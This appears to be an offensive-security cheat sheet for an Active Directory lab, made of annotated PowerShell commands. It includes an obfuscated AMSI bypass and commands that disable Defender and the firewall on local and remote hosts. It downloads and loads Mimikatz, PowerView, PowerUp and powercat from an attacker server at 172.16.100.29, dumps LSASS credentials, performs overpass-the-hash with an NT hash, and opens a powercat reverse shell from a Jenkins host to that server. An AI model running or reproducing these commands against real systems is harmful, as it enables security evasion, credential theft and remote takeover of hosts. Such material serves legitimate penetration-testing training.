New server (initial steps on a newly accessed host)
Bypass AMSI (run inside the `-ep bypass` shell started below, before loading any script):
# Start a new PowerShell process with ExecutionPolicy=Bypass so unsigned scripts
# (PowerView etc.) can be dot-sourced. Everything below runs INSIDE this new
# process. Authorized engagements only.
powershell -ep bypass
# AMSI bypass. The format strings resolve to:
#   [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
#        .GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# i.e. the classic amsiInitFailed patch. The case-mangling/backtick/format-string
# obfuscation is there because the plain form is signatured; expect an up-to-date
# engine to flag this variant too. The patch is per-process: it does NOT carry
# over to other shells or to remote PSSessions, so re-run it in each one.
# Run it BEFORE importing any tooling, otherwise the import itself is scanned.
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Dot-source PowerView from the current directory and confirm it loaded.
. .\PowerView.ps1
Get-NetUser
Disable Defender and the firewall
#check status of Microsoft Defender
# Read-only. Look at IsTamperProtected (when present): with Tamper Protection
# on, the Set-MpPreference changes below are ignored, so check first.
Get-MpComputerStatus
#Disable Firewall
# Any one of these is enough; the 1st and 3rd lines are the same command twice.
# Profile changes are written to the Windows Firewall event log and are a
# common alert trigger -- a single narrow allow rule is usually quieter.
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
#Disable Antivirus
# Turns off real-time scanning only. Needs local admin; Defender logs the
# configuration change (Operational log, event 5007) and EDR typically alerts.
Set-MpPreference -DisableRealtimeMonitoring $true
#Exclude file type
# Quieter alternative to switching AV off: exclude only what you need.
# Replace EXTENSION with e.g. ps1 (no leading dot needed).
Set-MpPreference -ExclusionExtension EXTENSION
#Exclude locations
Set-MpPreference -ExclusionPath PATH\TO\FOLDER
# Same changes on a remote host. $sess must already exist (created with
# New-PSSession, see the lateral-movement steps) and you need admin there.
# -DisableIOAVProtection stops scanning of downloaded files/attachments.
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
#How to delete active threat on Microsoft Defender
# Removes all currently detected threats from the machine -- destructive.
Remove-MpThreat
Downloading scripts (to disk, from the attacker web server at 172.16.100.29)
# Pull tooling from the attacker web server (plain HTTP -- lab use) and write it
# to the root of C:\. Writing to disk means Defender scans each file on write,
# and these are all well-known signatured scripts: do this only after AV is
# disabled/excluded, or load them in memory with `iex (iwr ...)` instead.
# On Windows PowerShell 5.x, Invoke-WebRequest may need -UseBasicParsing.
Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1
Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\powercat.ps1
Enumerate users (PowerView)
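# PowerView user enumeration. The script is written to disk first (Defender
# scans on write); if AV is still active, prefer `iex (iwr ...)` to stay in memory.
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
#Get a list of users in the current domain
Get-NetUser
Get-NetUser -Username student1
#Get list of all properties for users in the current domain
Get-UserProperty
# NOTE: parameter names below use a plain ASCII hyphen. The original notes had
# Unicode en-dashes (U+2013) from a copy/paste; PowerShell usually tolerates
# them, but anything else you paste the line through may not.
Get-UserProperty -Properties pwdlastset
Get-UserProperty -Properties badpwdcount
#Find machines where the current user has local admin access
#(connects to each host in the domain -- noisy on a large domain)
Find-LocalAdminAccess
#Search for a particular string in a user's attributes
#(description fields are a frequent place to find passwords):
Find-UserField -SearchField Description -SearchTerm "pass"
#Get the group membership for a user:
Get-NetGroup -UserName "student1"
#Tools -- separate scripts (dot-source each before use); by their names they do
#the same local-admin check over WMI / PS Remoting instead of SMB.
Find-WMILocalAdminAccess.ps1
FindPSRemotingLocalAdminAccess.ps1
#Find local admins on all machines of the domain
#(needs administrator privs on non-dc machines).
Invoke-EnumerateLocalAdmin -Verbose
#Find computers where a domain admin (or specified user/group) has sessions:
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
#To confirm admin access on the hosts found (adds an admin check per host):
Invoke-UserHunter -CheckAccess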
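#Find computers where a domain admin is logged in. -Stealth only queries a
#smaller set of commonly used servers (e.g. file servers, DCs) rather than every
#host, so it makes far fewer connections. (The original line was un-commented
#prose and would not paste cleanly.)
Invoke-UserHunter -Stealth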
Access to other servers: enumerate computers and check for remote command execution via PowerShell remoting
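# Computer enumeration via PowerView. The original notes downloaded the script
# here but never loaded it; Import-Module is required before Get-NetComputer
# works (harmless if PowerView was already imported in this session).
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
#List computer objects in the current domain
Get-NetComputer
# ASCII hyphens below; the original had Unicode en-dashes (U+2013) from a
# copy/paste, which PowerShell usually accepts but other tools may not.
Get-NetComputer -OperatingSystem "*Server 2016*"
#Only hosts that answer a ping (pings every host -- slow and noisy)
Get-NetComputer -Ping
#All LDAP attributes of each computer object
Get-NetComputer -FullData
#Find machines where the current user has local admin access
Find-LocalAdminAccess
#Same, with progress output per host
Find-LocalAdminAccess -Verbose
#Tools -- separate scripts (dot-source each before use); by their names they do
#the same local-admin check over WMI / PS Remoting instead of SMB.
Find-WMILocalAdminAccess.ps1
FindPSRemotingLocalAdminAccess.ps1
#Find local admins on all machines of the domain
#(needs administrator privs on non-dc machines).
Invoke-EnumerateLocalAdmin -Verbose
#Find computers where a domain admin (or specified user/group) has sessions:
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
#To confirm admin access on the hosts found:
Invoke-UserHunter -CheckAccess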
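#Find computers where a domain admin is logged in. -Stealth only queries a
#smaller set of commonly used servers (e.g. file servers, DCs) rather than every
#host, so it makes far fewer connections. (The original line was un-commented
#prose and would not paste cleanly.)
Invoke-UserHunter -Stealth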
Running processes
Get hashes and move laterally
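# Lateral movement: dump credentials on a host where we are admin, then reuse
# them. Every step here is loud (LSASS access, AV/firewall changes) -- run only
# with explicit authorization.
Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
Import-Module C:\Invoke-Mimikatz.ps1
#Find machines where the current user has local admin access
#(ASCII hyphen; the original had a Unicode en-dash from a copy/paste)
Find-LocalAdminAccess -Verbose
#Tools -- separate scripts doing the same check over WMI / PS Remoting
Find-WMILocalAdminAccess.ps1
FindPSRemotingLocalAdminAccess.ps1
#Step One: Find where the interesting users are logged in:
Invoke-UserHunter
#Step Two: check whether we have admin access on those hosts:
Invoke-UserHunter -CheckAccess
#Step Three: Check that we can execute commands remotely (WinRM must be reachable):
Invoke-Command -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock{whoami;hostname;whoami /priv}
#Step Four: Create a persistent session, reused by the Invoke-Command calls below:
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
$sess
#Step Five: Load Invoke-Mimikatz into THIS (local) session straight from the web
#server, nothing written to disk. Run the AMSI bypass first or the load is blocked.
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1)
#or, if iwr hangs/errors on IE first-run configuration (Windows PowerShell 5.x):
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1 -UseBasicParsing)
#Step Six: Disable AV and Firewall on the REMOTE host. Ignored when Tamper
#Protection is on and logged by Defender either way. This does not disable AMSI
#in the remote runspace -- the local AMSI bypass does not carry over, so the
#next step may still be caught there.
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
#Step Eight: run the locally loaded Invoke-Mimikatz function inside the remote
#session (${function:...} ships its definition over the wire). By default this
#reads credentials out of LSASS on the remote host; expect an EDR alert.
Invoke-Command -ScriptBlock ${function:Invoke-mimikatz} -Session $sess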
Then close the remote session (e.g. `Remove-PSSession $sess`) before continuing -- IMPORTANT
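#Step Nine: Overpass-the-Hash (use an NT hash to obtain a new logon session)
#Open an elevated PowerShell on the LOCAL computer: sekurlsa::pth needs admin
#(SeDebugPrivilege) to inject into LSASS.
#Disable AV (same caveats as before: ignored under Tamper Protection, logged as
#Defender event 5007)
Set-MpPreference -DisableRealtimeMonitoring $true
#Import Invoke-Mimikatz (relative path -- run this from the folder holding the script)
Import-Module .\Invoke-Mimikatz.ps1
#Perform the Overpass-the-Hash attack. The mimikatz command must be wrapped as
#'"..."' so it reaches mimikatz as ONE argument; the original line was missing
#the closing single quote and would not parse.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'
#Step Ten: a new PowerShell window opens whose logon session carries svcadmin's
#credentials for NETWORK authentication only. `whoami` in that window still shows
#your original user -- that is expected; verify with a remote command instead.
whoami
Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
#Dump credentials from LSASS locally / on a remote host. The original second
#line had no value for -ComputerName; replace HOSTNAME with the target.
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName HOSTNAME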
Overpass-the-hash: generate a logon session (token) from an NT hash.
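#Overpass-the-Hash with a different account. Wrap the mimikatz command as
#'"..."': the original used bare double quotes, which PowerShell consumes, so
#mimikatz would likely receive the space-separated pieces as separate commands.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'
#Crack NT hashes offline with John; "hash" is a file containing the hash(es).
#Usually unnecessary -- the NT hash alone is enough for pass-the-hash above;
#crack only when the cleartext itself is needed.
john --format=nt hash
#Download for Windows. This is a third-party mirror; prefer the official
#Openwall release and verify the download's hash/signature before running it.
# https://www.techspot.com/downloads/6970-john-the-ripper.html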
Jenkins reverse shell (powercat)
# On the Jenkins host (e.g. from a script console or build step): download
# powercat from the attacker web server into memory, connect back to
# 172.16.100.29:443 and hand the attacker a PowerShell (-ep = -ExecutePowershell).
# Plain-HTTP fetch of a well-known script: expect AMSI/Defender to flag it
# unless bypassed on that host.
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.29/powercat.ps1')); powercat -c 172.16.100.29 -p 443 -ep;
# On the attacker box, started BEFORE triggering the Jenkins command: listen on
# 443 (-l), verbose (-v), give up after 1064 seconds without a connection (-t).
powercat -l -v -p 443 -t 1064
Privilege escalation (PowerUp)
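#Local privilege-escalation checks with PowerUp. The download writes to C:\ but
#the original imported .\PowerUp.ps1 (relative to the current directory), which
#only works when the shell happens to be in C:\ -- use the absolute path.
Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1
Import-Module C:\PowerUp.ps1
#Runs all PowerUp checks (e.g. unquoted service paths, weak service/registry
#permissions, AlwaysInstallElevated). Read-only, but it is a well-known script
#and will be flagged if AV/AMSI is still active.
Invoke-AllChecks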
Downloading scripts (alternate location)
# Note the target directory differs from the earlier download (C:\powercat.ps1).
# Invoke-WebRequest -OutFile does not create missing directories: make sure
# C:\Downloads exists (mkdir C:\Downloads) or this fails with a path error.
Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\Downloads\powercat.ps1